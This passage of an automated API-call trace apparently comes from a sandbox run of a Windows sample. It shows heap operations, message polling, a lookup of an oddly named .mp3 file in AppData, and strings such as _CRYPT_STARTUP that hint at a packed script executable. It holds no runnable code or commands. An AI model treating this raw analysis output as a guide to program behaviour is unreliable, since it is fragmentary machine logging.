Size=0x10) returned 0x2e50620 [0227.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0227.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0227.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0227.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0227.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0227.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0227.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0227.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0227.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0227.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0227.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0227.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0227.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0227.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0227.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0227.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0227.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0227.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0227.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0227.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.664] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DS6Dq4b7eKkPU5JH.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaf3ebe0, ftCreationTime.dwHighDateTime=0x1d5eca9, ftLastAccessTime.dwLowDateTime=0x1c2cf1e0, ftLastAccessTime.dwHighDateTime=0x1d5e4ec, ftLastWriteTime.dwLowDateTime=0x1c2cf1e0, ftLastWriteTime.dwHighDateTime=0x1d5e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x13541, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="DS6Dq4b7eKkPU5JH.mp3", cAlternateFileName="DS6DQ4~1.MP3")) returned 0xa876d0 [0227.664] FindClose (in: hFindFile=0xa876d0 | out: hFindFile=0xa876d0) returned 1 [0227.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0227.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.665] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0227.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0227.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0227.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.666] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0227.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0227.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0227.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0227.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0227.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0227.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0227.666] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0227.666] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0227.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0227.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0227.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0227.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0227.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0227.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0227.668] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0227.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0227.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0227.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0227.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0227.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0227.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0227.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0227.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0227.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0227.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0227.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0227.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0227.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0227.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0227.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0227.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0227.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0227.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0227.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 